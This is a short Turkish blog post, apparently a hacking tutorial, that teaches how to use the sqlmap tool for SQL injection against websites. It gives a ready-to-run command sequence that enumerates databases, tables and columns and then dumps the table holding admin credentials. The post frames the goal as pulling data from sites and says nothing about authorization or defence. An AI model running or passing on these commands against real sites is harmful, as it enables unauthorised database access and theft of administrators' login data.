Sqlmap...
Bu python diliyle yazılmış olan aracı kullanarak Sql injection yaparken hem pro olarak hemde kolay bir şekilde sitelerin bilgilerini çekebileceksiniz.
Fakat bilmeniz gereken bazı sqlmap kodları vardır bunları ezberlemek kolaydır ben mantıklı anlatmaya çalışacağım bu yüzden kolay ezberleyeceksiniz.
1-sql injection yaparken önce database ismini bulacaksınız.
2-Admin bilgilerinin bulunduğu tablo ismini bulacaksınız
3-Admin bilgilerinin bulunduğu kolonu bulup
Bilgileri isteyeceğiz.Sıralama Database>tablo>kolon.
İşte kodları yazarkende aynı bu şekilde isteyceğiz.Başlayalım.
Ben kali linux kullandığım için biraz farklı görünebilir ama kodlar aynıdır tek fark siz sqlmap.py yazarak çalıştıracaksınız komut yazarken.
sqlmap -u site --dbs (databaseismini istiyoruz)
sqlmap -u site -D dbismi --tables (bulduğumuz db ismini yazıp tabloyu istiyoruz)
sqlmap -u site -D dbismi -T tabloismi --columns (kolon)
sqlmap -u site -D dbismi -T tabloismi -C colonismi --dump (ve bilgiler)
örnek..)
Hiç yorum yok:
Yorum Gönder